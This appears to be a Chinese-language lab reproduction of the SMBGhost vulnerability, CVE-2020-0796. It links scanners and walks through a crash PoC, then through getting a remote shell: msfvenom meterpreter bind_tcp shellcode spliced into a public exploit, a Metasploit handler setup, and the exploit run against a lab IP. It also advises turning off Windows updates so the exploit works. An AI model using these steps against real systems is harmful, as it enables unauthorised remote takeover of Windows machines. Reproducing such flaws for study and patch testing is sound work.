CVE-2020-0796 漏洞复现

漏洞介绍

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

详情可以去看看freebuf的介绍Windows SMB Ghost(CVE-2020-0796)。

漏洞检测

推荐两个检测的工具

一个是奇安信的http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

一个是github上的:https://github.com/ollypwn/SMBGhost。

CVE-2020-0796 漏洞复现_第1张图片

漏洞利用

蓝屏POC

POC地址

使用方法:python CVE-2020-0796.py Ip

CVE-2020-0796 漏洞复现_第2张图片

拿shell

首先下载该exphttps://github.com/chompie1337/SMBGhost_RCE_PoC,然后放在kali下。

生成一个shellcode msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o exp.txt

然后把exp.txt里面的buf全部替换成uSER_PAYLOAD,然后替换下载的exp中的exploit.py文件中相应的部分
CVE-2020-0796 漏洞复现_第3张图片
CVE-2020-0796 漏洞复现_第4张图片

进入metasploit

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.1.88
Exploit

最后就在下载的exp目录下执行 python3 exploit.py -ip 192.168.1.88

CVE-2020-0796 漏洞复现_第5张图片

当执行到倒数第二部的时候就回车,就可以获得一个session,也有一定几率蓝屏。

CVE-2020-0796 漏洞复现_第6张图片

如果出现了[-] physical read primitive failed!就是漏洞被修复了,要把windows自动更新关掉。

你可能感兴趣的:(CVE-2020-0796 漏洞复现)